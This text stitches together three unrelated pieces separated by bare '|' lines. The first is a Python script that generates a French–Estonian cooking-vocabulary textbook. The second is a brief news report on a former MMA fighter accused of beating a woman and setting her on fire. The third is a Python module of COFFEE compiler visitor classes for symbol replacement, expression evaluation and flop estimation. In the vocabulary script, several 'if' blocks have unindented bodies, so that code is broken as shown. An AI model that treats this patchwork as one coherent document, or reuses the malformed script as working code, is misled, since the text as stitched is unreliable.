Kokadele.parse_words(Nom,u"""
le riz pilaf [ri pi'laf] : pilaff
les pâtes ['paat] : pastaroad
la farine [far'in] : jahu
la bouillie [bui'jii] : puder
le gruau [grü'oo] : puder
le pain [pÄ~] : sai | leib
la tartine [tar'tin] : võileib
la baguette [ba'gät] : prantsuse pikk sai
le croustillon [krusti'jO~] : õlis praetud kohupiimapall
le crouton [kru'tO~] : krutoon
""")
Kokadele.add_lesson(u"Koostisosad", u"""""")
Kokadele.parse_words(Nom,u"""
le ingrédient [Ä~gre'djA~] : koostisosa
le lait [lä] : piim
le beurre [bÖÖr]: või
la crème [kr'ääm] : kreem | koor
le sucre ['sükrə] : suhkur
le sel [säl] : sool
le poivre ['pwaavrə] : pipar
""")
Kokadele.add_lesson(u"Ürdid", u"""""")
Kokadele.parse_words(Nom,u"""
le assaisonnement [asäzon'mA~] : maitsestamine
le condiment [kO~di'mA~] : maitseaine
la épice [e'pis] : vürts
les fines herbes [fin'zärbə] : fines herbes ("peened ürdid")
une herbe [ärbə] : ürt
le persil [pär'sil] : petersell
le céléri [sele'ri] : seller
la gousse d'ail [guss 'daij] : küüslaugu küün
l'ail (m) [aj] : küüslauk
un oignon [on'jO~] : sibul
la ciboulette [sibu'lät] : murulauk
la câpre ['kaaprə] : kappar
le gingembre [žÄ~žA~brə] : ingver
""")
Kokadele.add_lesson(u"Köögis", u"""""")
Kokadele.parse_words(Nom,u"""
la cuisine [kwi'zin] : köök
la cuisinière [kwizin'jäär] : pliit
le four [fuur] : ahi
le four à micro-ondes [fuur a mikro 'O~də] : mikrolaine ahi
le moulin [mu'lÄ~] : veski
le congélateur [kO~gela'tÖÖr] : külmutuskapp
un évier [evi'ee] : kraanikauss
la armoire [arm'waar] : kapp
le placard [pla'kaar] : seinakapp
""")
Kokadele.add_lesson(u"Köögiriistad", u"""""")
# Kitchen utensils vocabulary.
# Fix: French spelling is "allumette" (double l), pronounced with [ü]
# (French u = [ü] throughout this file's transcription scheme).
Kokadele.parse_words(Nom,u"""
le fouet [fu'ä] : vispel
la louche [lušə] : kulp
la allumette [alü'mätə] : tuletikk
la coquille [ko'kiijə] : merekarp
la cocotte [ko'kot] : malmkastrul, kokott
la poêle [pwal] : pann
la râpe [rap] : riiv
la casserole [kas'roll] : kastrul
la russe [rüs] : kastrul
la marmite [mar'mit] : katel
la braisière [bräz'jäär] : pott smoorimiseks
le caquelon [kak'lO~] : fondüüpott
le bain-marie [bÄ~ma'rii] : veevann
la passoire [pas'waar] : sõel
""")
Kokadele.add_lesson(u"Mida kokk teeb", intro=u"""
""")
Kokadele.parse_words(Verbe,u"""
préparer [prepa'ree] : ette valmistama
# composer [kO~po'zee] : koostama
# baisser [bäs'see] : alla laskma, madaldama
# porter [por'tee] : kandma
laver [la'vee] : pesema
concasser [kO~kas'see] : peenestama (tükkideks)
farcir [far'siir] : farssima (täidisega täitma)
*hacher [a'šee] : hakkima
éplucher [eplü'šee]: koorima
émincer [émÄ~'see] : lõikama viiludeks
tourner [tur'nee] : keerama, pöörama
# utiliser [ütili'zee] : kasutama
préchauffer [préšoo'fee] : ette kütma
""")
Kokadele.add_lesson(u"Pliidil", u"""""")
Kokadele.parse_words(Nom,u"""
la cuisson [küis'sO~] : keetmine
le blanchiment [blA~ši'mA~] : blanšeerimine
le rôtissage [rotis'saaž] : praadimine (panni peal)
le rissolement [risol'mA~] : praadimine
la friture [fri'tüür] : friipraadimine (õlis või rasvas)
le grillage [gri'jaaž] : röstimine
le braisage [bre'zaaž] : smoorimine
""")
#~ le bain marie [bÄ~ ma'rii] :
Kokadele.parse_words(Verbe,u"""
cuire [kwiir] : keetma
blanchir [blA~'šiir] : blanšeerima
rôtir [ro'tiir] : praadima (panni peal)
rissoler [risso'lee]: (rasvas) pruunistama
frire [friir] : praadima (õlis)
griller [gri'jee] : röstima
braiser [brä'zee] : smoorima
""")
if FULL_CONTENT:
General.add_lesson(u"Linnad prantsusmaal",columns=[GEON("Linn"), GEOM, GEOF])
General.parse_words(NomGeographique,u"""
Avignon [avin'jO~] | avignonnais [avinjo'nä] | avignonnaise [avinjo'nääz] : -
Bordeaux [bor'doo] | bordelais [bordə'lä] | bordelaise [bordə'lääz] : -
Bourgogne [burgOnjə] | bourguignon [burgin'jO~] | bourguignonne [burgin'jOnn] : -
Dijon [di'žO~] | dijonnais [dižon'nä] | dijonnaise [dižon'nääz] : -
Lyon [li'O~] | lyonnais [lio'nä] | lyonnaise [lio'nääzə] : -
Marseilles [mar'säijə] | marseillais [marsäi'jä]| marseillaise [marsäi'jääz] : -
Paris [pa'ri] | parisien [pariz'jÄ~]| parisienne [pariz'jän] : Pariis
Reims [rÄ~s] | rémois [rem'wa]| rémoise [rem'waaz] : Reims
Verdun [vär'dÖ~] | verdunois [värdü'nwa]| verdunoise [värdü'nwaaz] : -
Versailles [ver'saj] | versaillais [värsa'jä] | versaillaise [värsa'jääz] : -
""")
#~ Vocabulary.parse_words(NomGeographique,u"""
#~ la France [frA~s] : Prantsusmaa
#~ la Belgique [bel'žik] : Belgia
#~ une Allemagne [al'manjə] : Saksamaa
#~ une Angleterre [A~glə'täär] : Inglismaa
#~ une Estonie [ästo'nii]: Eesti
#~ une Hollande [o'lA~də]: holland
#~ une Espagne [es'panjə]: hispaania
#~ une Italie [ita'lii]: itaalia
#~ """)
#~ Vocabulary.parse_words(Adjectif,u"""
#~ français [frA~'sä] | française [frA~'sääz] : prantsuse
#~ estonien [esto'njÄ~] | estonienne [esto'njän] : eesti
#~ espagnol [espan'jol] | espagnole [espan'jol] : hispaania
#~ hollandais [olA~'dä] | hollandaise [olA~'dääz]: holandi
#~ """)
Kokadele.add_lesson(u"Omadussõnad (kulinaaria)", intro=u"""
Selliseid omadussõnu leidub erinevates kulinaaria väljundites.
""",columns=[M, F, ET])
Kokadele.parse_words(Adjectif,u"""
beurré [bÖÖ'ree] | beurrée [bÖÖ'ree]: võiga
braisé [brä'zee] | braisée [brä'zee] : smooritud
coupé [ku'pee] | coupée [ku'pee] : lõigatud
épicé [epi'see] | épicée [epi'see] : vürtsitatud, vürtsikas
glacé [glas'see] | glacée [glas'see] : jäätunud
haché [a'šee] | hachée [a'šee] : hakkitud
manié [man'jee] | maniée [man'jee] : käsitletud
poché [po'še] | pochée [po'šee] : uputatud keeva vette
rissolé [riso'lee] | rissolée [riso'lee] : (rasvas) pruunistatud
sauté [soo'tee] | sautée [soo'tee] : rasvas praetud
velouté [velu'tee] | veloutée [velu'tee] : sametine, sametitaoline
bouilli [bui'ji] | bouillie [bui'jii] : keedetud
croustillant [krusti'jA~] | croustillante [krusti'jA~t] : krõbe
piquant [pi'kA~] | piquante [pi'kA~t] : terav
gourmand [gur'mA~] | gourmande [gur'mA~d] : maiasmokk
paysan [pei'zA~] | paysanne [pei'zann] : talu-, talupoja-
royal [rwa'jal] | royale [rwa'jal] : kuninglik
suprême (mf) [sü'prääm] : ülem, kõrgem, ülim
""")
Kokadele.add_lesson(u"Kastmete valmistamine", intro=u"""""")
Kokadele.parse_words(Nom,u"""
la sauce [soos] : kaste
la moutarde [mu'tardə] : sinep
le vinaîgre [vin'äägrə] : äädikas
la mayonnaise [majo'nääz] : majonees
la vinaîgrette [vine'grät] : vinegrett
le beurre manié [bÖÖr man'jee]: jahuvõi
le roux [ru] : rasvas kuumutatud jahu
le roux blanc [ru blA~] : valge segu
le roux blond [ru blO~] : kollane segu
le roux brun [ru brÖ~] : pruun segu
la sauce espagnole [espan'jOl] : pruun põhikaste
la sauce demi-glace [dəmi'glas] : redutseeritud pruun põhikaste
le jus de rôti [žu də ro'ti] : redutseeritud puljong, "praeliha mahl"
le jus lié [žu li'ee] : maisi või nooljuurejahuga pruun kaste
le mirepoix [mirə'pwa] : praetud kuubikud (sibul, porgand, seller)
la coupe en dés [kup A~ 'dee] : lõikamine kuubikuteks
la coupe en brunoise [kup A~ brün'waaz] : juurvilja lõikamine kuubikuteks (2mm)
la coupe julienne [kup jül'jän] : juurvilja lõikamine ribadeks (2mm)
la coupe jardinière [kup žardin'jäär] : juurvilja lõikamine ribadeks
la coupe à la paysanne [kup ala päi'zan] : juurvilja lõikamine ketasteks
""")
Kokadele.add_lesson(u"Kastmed", intro=u"""""")
Kokadele.parse_words(Nom,u"""
la sauce paysanne [pei'zan] : talupoja kaste
la sauce chasseur [ša'sÖÖr] : jahimehe kaste
la sauce jardinière [žardin'jäär] : aedniku kaste
la sauce piquante [pi'kA~tə] : pikantne kaste
la sauce poivrade [pwav'raadə] : piprakaste
la sauce Grand Veneur [grA~ və'nÖÖr] : jäägri kaste
la sauce Bigarrade [biga'raadə] : apelsinikaste
la sauce smitane [smi'tanə] : hapukoorekaste
la sauce Lyonnaise [lio'nääzə] : pruun sibulakaste
la sauce Bourguignonne [burgin'jOn] : Burgundia kaste
la sauce Robert [ro'bäär] : Roberti kaste
la sauce Madère [ma'däär] : Madeira kaste
la sauce Mornay [mOr'nä] : juustukaste
la sauce Porto [pOr'to] : portveini kaste
la sauce Sabayon [saba'jO~] : Sabayon-kaste
la sauce italienne [ital'jän] : itaalia kaste
la sauce veloutée [vəlu'tee] : hele põhikaste
la sauce blanche [blA~šə] : tuletatud hele kaste
la sauce bordelaise [bOrdə'lääz] : punase veini kaste
la sauce béarnaise [bear'nääz] : bernoo kaste
la sauce béchamel [beša'mäl] : valge põhikaste
la sauce aurore [o'rOOr] : aurorakaste
la sauce Choron [šo'rO~] : choronkaste
la sauce Foyot [fwa'jo] : foyotkaste
la macédoine [mase'dwan] : juurviljasalat
""")
Kokadele.add_lesson(u"Veinialad Prantsusmaal", u"""
""",columns=[FR,PRON])
Kokadele.parse_words(NomGeographique,u"""
Alsace [al'zas] : Elsass
Beaujolais [boožo'lä] : -
Bordeaux [bOr'doo] : -
Bourgogne [bur'gonjə] : -
Champagne [šA~'panjə] : -
Charente [ša'rA~tə] : -
Poitou [pwa'tu] : -
Corse ['korsə] : Korsika
Jura [žü'ra] : -
Savoie [savu'a] : -
Languedoc [lA~gə'dok] : -
Roussillon [russi'jO~] : -
Provence [pro'vA~sə] : -
Sud-Ouest [süd'uest] : -
Gascogne [gas'konjə] : -
Val de Loire [val də 'lwaarə] : Loire'i org
Vallée du Rhône [val'lee dü roonə] : Rhône'i org
""")
Kokadele.add_lesson(u"Prantsuse veinid", u"""
Prantsuse veinid on üle 400, siin ainult mõned.
""",columns=[FR,PRON])
Kokadele.parse_words(Nom,u"""
le Chasselas [šas'la] : -
le Grand Cru [grA~'krü] : -
le Pinot Noir [pi'no nwaar] : -
la Côte de Brouilly [koot də bru'ji] : -
le Saint-Amour [sÄ~ta'muur] : -
le Bordeaux clairet [bOr'doo klä'rä] : -
le Médoc [me'dok] : -
le Saint-Émilion [sÄ~temi'jO~] : -
la Côte de Beaune [koot də boon] : -
les Côtes du Ventoux [kootə du vA~'tu] : -
le Minervois [minerv'wa] : -
les Côtes d'Auvergne [kootə do'värnjə] : -
""")
if FULL_CONTENT:
General.add_lesson(u"Omadussõnad (üld)", intro=u"""
Omadussõnad, mis lõpevad "e"-ga, ei muutu soo järgi.
""",columns=[M, F, ET])
General.parse_words(Adjectif,u"""
chaud [šoo] | chaude [šoodə] : kuum
froid [fru'a] | froide [fru'aadə] : külm
gros [gro] | grosse [grossə] : paks
mince (mf) [mÄ~s] : õhuke
bon [bO~] | bonne [bonnə] : hea
beau [boo] | belle [bälə] : ilus
joli [žo'li] | jolie [žo'lii] : ilus
demi [də'mi] | demie [də'mii]: pool
entier [A~'tjee] | entière [A~'tjäär] : terve, täis
double (mf) ['duublə] : topelt
facile (mf) [fa'sil] : lihtne
possible (mf) [po'siblə] : võimalik
""")
General.add_lesson(u"Loeme kümneni", intro=u"""""")
General.parse_words(Numerique,u"""
un [Ö~] : üks
deux [döö] : kaks
trois [trwa] : kolm
quatre [katrə] : neli
cinq [sÄ~k] : viis
six [sis] : kuus
sept [sät] : seitse
huit [üit] : kaheksa
neuf [nÖf] : üheksa
dix [dis] : kümme
""")
General.add_lesson(u"Värvid", columns=[M, F, ET])
General.parse_words(Adjectif,u"""
brun [brÖ~] | brune [brün] : pruun
vert [väär] | verte [värtə] : roheline
bleu [blöö] | bleue [blöö] : sinine
rouge (mf) [ruuž] : punane
jaune (mf) [žoon] : kollane
blond [blO~] | blonde [blO~də] : blond
beige (mf) [bääž] : beež
orange (mf) [o'rA~ž] : oranž
blanc [blA~] | blanche [blA~š] : valge
noir [nwaar] | noire [nwaar] : must
""")
General.add_lesson(u"Kuud")
General.parse_words(NomPropre,u"""
janvier [žA~vi'ee] : jaanuar
février [fevri'ee] : veebruar
mars [mars] : märts
avril [a'vril] : aprill
mai [mä] : mai
juin [žwÄ~] : juuni
juillet [žwi'jä] : juuli
août [ut] : august
septembre [sep'tA~brə] : september
octobre [ok'tOObrə] : oktoober
novembre [no'vA~brə] : november
décembre [de'sA~brə] : detsember
""")
u"""
On met une majuscule
uniquement quand l'adjectif est employé comme
nom pour désigner une personne.
Ex. : Les Français parlent en français à leurs amis français
"""
General.add_lesson(u"Riigid",columns=[GEON("Riik"), GEOM, GEOF, ET])
General.parse_words(None,u"""
la France [frA~s] | français [frA~'sä] | française [frA~'sääz] : Prantsusmaa
l'Estonie (f) [ästo'nii] | estonien [esto'njÄ~] | estonienne [esto'njän] : Eesti
l'Allemagne (f) [al'manjə] | allemand [al'mA~]| allemande [al'mA~də] : Saksamaa
l'Angleterre (f) [A~glə'täär] | anglais [A~'glä]| anglaise [A~'glääz] : Inglismaa
la Belgique [bel'žik] | belge [belžə]| belge [belžə] : Belgia
la *Hollande [o'lA~də] | hollandais [olA~'dä] | hollandaise [olA~'dääz] : Holland
l'Espagne (f) [es'panjə] | espagnol [espan'jol] | espagnole [espan'jol] : Hispaania
l'Italie (f) [ita'lii] | italien [ital'jÄ~]| italienne [ital'jen] : Itaalia
""")
if FULL_CONTENT:
General.add_lesson(u"Kuulsad inimesed")
General.parse_words(NomPropre,u"""
Jacques Chirac [žaak ši'rak] : # endine president
Georges Brassens [žorž bra'sÄ~s] : # laulja
Brigitte Bardot [bri'žit bar'do] : # laulja
Louis de Funès [lu'i də fü'nääz] : # näitleja
""")
General.add_lesson(u"Majad ja nende osad")
General.parse_words(Nom,u"""
la maison [mä'zO~] : maja
la cave [kaav] : kelder
la cuisine [kwi'zin] : köök
la salle de bain : vannituba
la chambre à coucher : magamistuba
le salon [sa'lO~] : elutuba
un escalier [eskal'jee] : trepp
la fenêtre [fə'näätrə] : aken
le parterre [par'täär] : esimene korrus
le premier étage [prəm'jeer_etaaž] : teine korrus
le jardin [žar'dÄ~] : aed
""")
if FULL_CONTENT:
Fun.add_lesson(u"Devinettes", intro=u"""
#. Que dit un vampire en quittant sa victime?
-- Merci beau cou.
#. Pourquoi les marins se marient-ils ?
-- Pour avoir une belle mer (mère).
""")
Fun.add_lesson(u"Virelangues", intro=u"""
#. Un chasseur sachant chasser doit savoir chasser sans son chien. ([ref s])
#. Chacun cherche son chat.
#. Poisson sans boisson est poison.
#. Ecartons ton carton, car ton carton me gêne.
#. Ton thé t'a-t-il ôté ta toux?
#. Tante, en ton temps teintais-tu tes tempes?
#. Les poules couvent souvent au couvent.
""")
Fun.parse_words(Nom,u"""
le poisson [pwa'sO~] : kala
le poison [pwa'zO~] : mürk
la boisson [bwa'sO~] : jook
le chasseur [ša'sÖÖr] : jahimees
le chien [šiÄ~] : koer
la toux [tu] : köha
""")
Fun.parse_words(Verbe,u"""
savoir [sa'vuaar] : teadma | oskama
chercher [šär'šee] : otsima
écarter [ekar'tee] : eest ära liigutama
ôter [oo'tee] : ära võtma
""")
Fun.parse_words(Autre,u"""
sans [sA~] : ilma
chacun [ža'kÖ~] : igaüks
""")
if FULL_CONTENT:
General.add_lesson(u"Lisa", intro=u"""
""")
General.parse_words(Autre,u"""
environ [A~vi'rO~] : umbes
facilement [fasil'mA~] : lihtsalt
rapidement [rapidə'mA~]: kiiresti
le autre [ootrə] : teine
le même [määm] : sama
""")
General.parse_words(Verbe,u"""
filer [fi'lee] : ketrama
baiser [bä'zee] : musitama
sauter [soo'tee] : hüppama
""")
General.parse_words(Nom,u"""
le midi [mi'di] : lõun | keskpäev
le soir [swaar] : õhtu
le matin [ma'tÄ~] : hommik
la tranche [trA~š] : lõik | viilukas
la coupe [kupp] : lõikamine | pokaal
la ébullition [ebüjis'jO~] : keemine
le feu [föö] : tuli
le baiser [bä'zee] : suudlus
le appétit [appe'ti] : isu
""")
unused = u"""
une aurore [or'Or] : koit
le fil [fil] : niit | lõng | nöör
une heure [ÖÖr] : tund
le dauphinois [dofinw'a] : lõunaprantsuse dialekt
"""
if HAS_EXERCICES:
Exercices.add_lesson(u"Lugeda oskad?", u"""
Õpetaja kirjutab tahvlile sari hääldamiskirjeldusi.
Õpilased loevad ette.
Ainult lugeda, mitte tõlkida.
""")
Exercices.parse_words(None,u"""
au clair de lune [okläärdə'lün] : kuuvalguses
le cœur de filet [kÖÖr də fi'lä] : veise sisefilee
le dessert [des'säär] : magustoit
la mousse au chocolat [musošoko'la] : šokolaadivaht
le pot-au-feu [poto'föö] : ühepajatoit
le petit-beurre [pəti'bÖÖr]: (kuiv küpsis)
la sauce chasseur [soos ša'sÖÖr] : jahimehe kaste
Poitou [pwa'tu] : -
la sauce italienne [soosital'jän] : itaalia kaste
le gratin dauphinois [gra'tÄ~ dofinw'a] : (tuntud retsept)
""")
Exercices.add_lesson(u"Kirjutada oskad?", u"""
Õpetaja loeb ette sari sõnu.
Õpilased kirjutavad paberile, kasutades hääldamiskirjelduse tähestik.
""")
Exercices.parse_words(None,u"""
le chevreuil [šəv'rÖj] : metskits
le soleil [so'leij] : päike
la boisson [bwa'sO~] : jook
le poisson [pwa'sO~] : kala
le requin [rə'kÄ~] : haikala
la cuillère [kwi'jäär] : lusikas
""")
if output_format == "rst":
Files = book.add_section(u"Failid",intro=u"""
Neid faile saad alla laadida ja kuulata koos trükitud lehtedega:
- `lk. 5 <dl/lk05.mp3>`_
- `lk. 6 <dl/lk06.mp3>`_
- `lk. 7 <dl/lk07.mp3>`_
- `lk. 8 <dl/lk08.mp3>`_
""")
if __name__ == '__main__':
    # Entry point: emit the vocabulary book either as reStructuredText
    # files or as a single ODT document, depending on output_format
    # (set earlier in this script). sys.argv[2] is the output path.
    if output_format == "rst":
        book.add_index(u"Sõnaraamat")
        book.write_rst_files(sys.argv[2])
    elif output_format == "odt":
        if False:
            # Disabled: the word-list section is not included in the ODT build.
            book.add_dictionary(u"Sõnade nimekiri")
        fn = sys.argv[2]
        book.write_odt_file(fn)
        # NOTE(review): os.startfile is Windows-only — confirm this script
        # is only run on Windows when producing ODT output.
        os.startfile(fn)
|
DURANT, Okla. – A former MMA fighter will head to trial after being accused of violently beating a woman and setting her on fire.
In March, authorities arrested Nehemiah Hellems after neighbors discovered the 50-year-old woman in the street.
Investigators say Hellems was reportedly upset over drugs.
When the neighbors found the woman on the street, they rushed to help her.
According to KXII, the victim took the stand on Tuesday and told the court that she loves and forgives Hellems.
In spite of the testimony, the judge ordered the case to go to trial in July.
|
from __future__ import absolute_import
import itertools
import operator
from copy import deepcopy
from collections import OrderedDict, defaultdict
import numpy as np
from coffee.visitor import Visitor
from coffee.base import Sum, Sub, Prod, Div, ArrayInit, SparseArrayInit
from coffee.utils import ItSpace, flatten
__all__ = ["ReplaceSymbols", "CheckUniqueness", "Uniquify", "Evaluate",
"EstimateFlops", "ProjectExpansion"]
class ReplaceSymbols(Visitor):
    """Replace named symbols in a tree, returning a new tree.

    :arg syms: A dict mapping symbol names to new Symbol objects.
    :arg key: a callable to generate a key from a Symbol, defaults to
         the string representation.
    :arg copy_result: optionally copy the new Symbol whenever it is
         used (guaranteeing that it will be unique)"""

    def __init__(self, syms, key=lambda x: str(x), copy_result=False):
        self.syms = syms
        self.key = key
        self.copy_result = copy_result
        super(ReplaceSymbols, self).__init__()

    def visit_Symbol(self, o):
        # Symbols with no registered replacement pass through unchanged.
        try:
            replacement = self.syms[self.key(o)]
        except KeyError:
            return o
        if not self.copy_result:
            return replacement
        # Rebuild the replacement so every use site gets a distinct object.
        ops, okwargs = replacement.operands()
        return replacement.reconstruct(ops, **okwargs)

    def visit_object(self, o):
        return o

    visit_Node = Visitor.maybe_reconstruct
class CheckUniqueness(Visitor):
    """
    Check if all nodes in a tree are unique instances.
    """

    def visit_object(self, o, seen=None):
        return seen

    # Some lists appear in operands()
    def visit_list(self, o, seen=None):
        for element in o:
            seen = self.visit(element, seen=seen)
        return seen

    def visit_Node(self, o, seen=None):
        seen = set() if seen is None else seen
        # Visit children first, accumulating every instance encountered.
        children, _ = o.operands()
        for child in children:
            seen = self.visit(child, seen=seen)
        if o in seen:
            raise RuntimeError("Tree does not contain unique nodes")
        seen.add(o)
        return seen
class Uniquify(Visitor):
    """
    Uniquify all nodes in a tree by recursively calling reconstruct
    """

    visit_Node = Visitor.always_reconstruct

    def visit_object(self, o):
        # Non-node leaves are duplicated wholesale.
        return deepcopy(o)

    def visit_list(self, o):
        return [self.visit(element) for element in o]
class Evaluate(Visitor):
    """
    Symbolically evaluate an expression enclosed in a loop nest, provided that
    all of the symbols involved are constants and their value is known.

    Return a dictionary mapping symbol names to (newly created) Decl nodes, each
    declaration being initialized with a proper (newly computed and created)
    ArrayInit object.

    :arg decls: dictionary mapping symbol names to known Decl nodes.
    :arg track_zeros: True if the evaluated arrays are expected to be
        block-sparse and the pattern of zeros should be tracked.
    """

    @classmethod
    def default_retval(cls):
        return OrderedDict()

    default_args = dict(loop_nest=[])

    def __init__(self, decls, track_zeros):
        self.decls = decls
        self.track_zeros = track_zeros
        # Map each binary AST node class to the numpy ufunc implementing it.
        self.mapper = {
            Sum: np.add,
            Sub: np.subtract,
            Prod: np.multiply,
            Div: np.divide
        }
        from coffee.vectorizer import vect_roundup, vect_rounddown
        self.up = vect_roundup
        self.down = vect_rounddown
        super(Evaluate, self).__init__()

    def visit_object(self, o, *args, **kwargs):
        return self.default_retval()

    def visit_list(self, o, *args, **kwargs):
        ret = self.default_retval()
        for entry in o:
            ret.update(self.visit(entry, *args, **kwargs))
        return ret

    def visit_Node(self, o, *args, **kwargs):
        ret = self.default_retval()
        for n in o.children:
            ret.update(self.visit(n, *args, **kwargs))
        return ret

    def visit_For(self, o, *args, **kwargs):
        # Accumulate the enclosing loop nest on the way down the tree.
        nest = kwargs.pop("loop_nest")
        kwargs["loop_nest"] = nest + [o]
        return self.visit(o.body, *args, **kwargs)

    def visit_Writer(self, o, *args, **kwargs):
        lvalue = o.children[0]
        writes = [l for l in kwargs["loop_nest"] if l.dim in lvalue.rank]
        # Evaluate the expression for each point in in the n-dimensional space
        # represented by /writes/
        dims = tuple(l.dim for l in writes)
        shape = tuple(l.size for l in writes)
        values, precision = np.zeros(shape), None
        for i in itertools.product(*[range(j) for j in shape]):
            point = {d: v for d, v in zip(dims, i)}
            expr_values, precision = self.visit(o.children[1], point=point, *args, **kwargs)
            # The sum takes into account reductions
            values[i] = np.sum(expr_values)
        # If values is not expected to be block-sparse, just return
        if not self.track_zeros:
            return {lvalue: ArrayInit(values)}
        # Sniff the values to check for the presence of zero-valued blocks: ...
        # ... set default nonzero pattern
        nonzero = [[(i, 0)] for i in shape]
        # ... track nonzeros in each dimension
        nonzeros_bydim = values.nonzero()
        mapper = []
        for nz_dim in nonzeros_bydim:
            mapper_dim = defaultdict(set)
            for i, nz in enumerate(nz_dim):
                point = []
                # ... handle outer dimensions
                for j in nonzeros_bydim[:-1]:
                    if j is not nz_dim:
                        point.append((j[i],))
                # ... handle the innermost dimension, which is treated "specially"
                # to retain data alignment
                for j in nonzeros_bydim[-1:]:
                    if j is not nz_dim:
                        point.append(tuple(range(self.down(j[i]), self.up(j[i]+1))))
                mapper_dim[nz].add(tuple(point))
            mapper.append(mapper_dim)
        for i, dim in enumerate(mapper[:-1]):
            # Group indices iff contiguous /and/ same codomain.
            # NOTE: the original used a Python-2-only tuple-parameter lambda,
            # `lambda (m, n): ...` (removed by PEP 3113); rewritten so the
            # module also parses under Python 3.
            ranges = []
            grouper = lambda pair: (pair[0] - pair[1], dim[pair[1]])
            for k, g in itertools.groupby(enumerate(sorted(dim.keys())), grouper):
                # Each item of /g/ is an (enumeration index, key) pair; we
                # only need the keys. (The original indexed the result of
                # map(), which is py2-only; a list comprehension works on both.)
                group = [key for _, key in g]
                ranges.append((group[-1] - group[0] + 1, group[0]))
            nonzero[i] = ranges or nonzero[i]
        # Group indices in the innermost dimension iff within vector length size
        ranges, grouper = [], lambda n: self.down(n)
        for k, g in itertools.groupby(sorted(mapper[-1].keys()), grouper):
            group = list(g)
            ranges.append((group[-1] - group[0] + 1, group[0]))
        nonzero[-1] = ItSpace(mode=1).merge(ranges or nonzero[-1], within=-1)
        return {lvalue: SparseArrayInit(values, precision, tuple(nonzero))}

    def visit_BinExpr(self, o, *args, **kwargs):
        ops, _ = o.operands()
        transformed = [self.visit(op, *args, **kwargs) for op in ops]
        if any(a is None for a in transformed):
            return
        values, precisions = zip(*transformed)
        # Precisions must match
        assert precisions.count(precisions[0]) == len(precisions)
        # Return the result of the binary operation plus forward the precision
        return self.mapper[o.__class__](*values), precisions[0]

    def visit_Par(self, o, *args, **kwargs):
        return self.visit(o.child, *args, **kwargs)

    def visit_Symbol(self, o, *args, **kwargs):
        try:
            # Any time a symbol is encountered, we expect to know the /point/ of
            # the iteration space which is being evaluated. In particular,
            # /point/ is pushed (and then popped) on the environment by a Writer
            # node. If /point/ is missing, that means the root of the visit does
            # not enclose the whole iteration space, which in turn indicates an
            # error in the use of the visitor.
            point = kwargs["point"]
        except KeyError:
            raise RuntimeError("Unknown iteration space point.")
        try:
            decl = self.decls[o.symbol]
        except KeyError:
            raise RuntimeError("Couldn't find a declaration for symbol %s" % o)
        try:
            values = decl.init.values
            precision = decl.init.precision
            shape = values.shape
        except AttributeError:
            raise RuntimeError("%s not initialized with a numpy array" % decl)
        sliced = 0
        for i, (r, s) in enumerate(zip(o.rank, shape)):
            dim = i - sliced
            # Three possible cases...
            if isinstance(r, int):
                # ...the index is used to access a specific dimension (e.g. A[5][..])
                values = values.take(r, dim)
                sliced += 1
            elif r in point:
                # ...a value is being evaluated along dimension /r/ (e.g. A[r] = B[..][r])
                values = values.take(point[r], dim)
                sliced += 1
            else:
                # .../r/ is a reduction dimension; keep it whole.
                # (list() so py3's lazy range is accepted uniformly by take.)
                values = values.take(list(range(s)), dim)
        return values, precision
class ProjectExpansion(Visitor):
    """
    Project the output of expression expansion.

    The caller should provide a collection of symbols C. The expression tree
    (nodes that are not of type :class:`~.Expr` are not allowed) is visited
    and a set of tuples returned, one tuple for each symbol in C. Each tuple
    represents the subset of symbols in C that will appear in at least one
    term after expansion.

    For example, be C = [a, b], and consider the following input expression: ::

        (a*c + d*e)*(b*c + b*f)

    After expansion, the expression becomes: ::

        a*c*b*c + a*c*b*f + d*e*b*c + d*e*b*f

    In which there are four product terms. In these terms, there are two in
    which both 'a' and 'b' appear, and there are two in which only 'b'
    appears. So the visit will return [(a, b), (b,)].

    :arg symbols: the collection of symbols searched for
    """

    @classmethod
    def default_retval(cls):
        return list()

    def __init__(self, symbols):
        self.symbols = symbols
        super(ProjectExpansion, self).__init__()

    def visit_object(self, o, *args, **kwargs):
        return self.default_retval()

    def visit_Expr(self, o, parent=None, *args, **kwargs):
        collected = self.default_retval()
        for child in o.children:
            collected.extend(self.visit(child, parent=o, *args, **kwargs))
        # Deduplicate while preserving first-seen order.
        deduped = []
        for entry in collected:
            if entry not in deduped:
                deduped.append(entry)
        return deduped

    def visit_Prod(self, o, parent=None, *args, **kwargs):
        if isinstance(parent, Prod):
            # Nested Prod: flatten the children's projections into one term.
            collected = self.default_retval()
            for child in o.children:
                collected.extend(self.visit(child, parent=o, *args, **kwargs))
            return [list(flatten(collected))]
        # Only the top level Prod, in a chain of Prods, should do the
        # tensor product.
        projections = [self.visit(child, parent=o, *args, **kwargs)
                       for child in o.children]
        combos = itertools.product(*projections)
        return [list(flatten(combo)) for combo in combos] or projections

    def visit_Symbol(self, o, *args, **kwargs):
        if o.symbol in self.symbols:
            return [[o.symbol]]
        return [[]]
class EstimateFlops(Visitor):
    """
    Estimate the number of floating point operations a tree performs.

    Does not look inside flat blocks, and all function calls are
    assumed flop free, so this probably underestimates the number of
    flops performed.

    Also, these are "effective" flops, since the compiler may do fancy
    things.
    """

    def visit_object(self, o, *args, **kwargs):
        return 0

    def visit_list(self, o, *args, **kwargs):
        total = 0
        for entry in o:
            total += self.visit(entry)
        return total

    def visit_Node(self, o, *args, **kwargs):
        operands, _ = o.operands()
        return sum(map(self.visit, operands))

    def visit_BinExpr(self, o, *args, **kwargs):
        # One flop for the operation itself, plus its operands.
        operands, _ = o.operands()
        return 1 + sum(map(self.visit, operands))

    def visit_AVXBinOp(self, o, *args, **kwargs):
        # A vector op counts as 4 flops (one per lane).
        operands, _ = o.operands()
        return 4 + sum(map(self.visit, operands))

    def visit_Assign(self, o, *args, **kwargs):
        # Skip the lvalue (operand 0): storing is not a flop.
        operands, _ = o.operands()
        return sum(map(self.visit, operands[1:]))

    def visit_AugmentedAssign(self, o, *args, **kwargs):
        # The implicit op (+=, *=, ...) is one flop; skip the lvalue.
        operands, _ = o.operands()
        return 1 + sum(map(self.visit, operands[1:]))

    def visit_For(self, o, *args, **kwargs):
        per_iteration = sum(map(self.visit, o.body))
        return (o.size / o.increment) * per_iteration

    def visit_Invert(self, o, *args, **kwargs):
        # Matrix inversion of an n x n operand: modeled as n^3 flops.
        operands, _ = o.operands()
        return operands[1].symbol ** 3

    def visit_Determinant1x1(self, o, *args, **kwargs):
        return 1

    def visit_Determinant2x2(self, o, *args, **kwargs):
        return 3

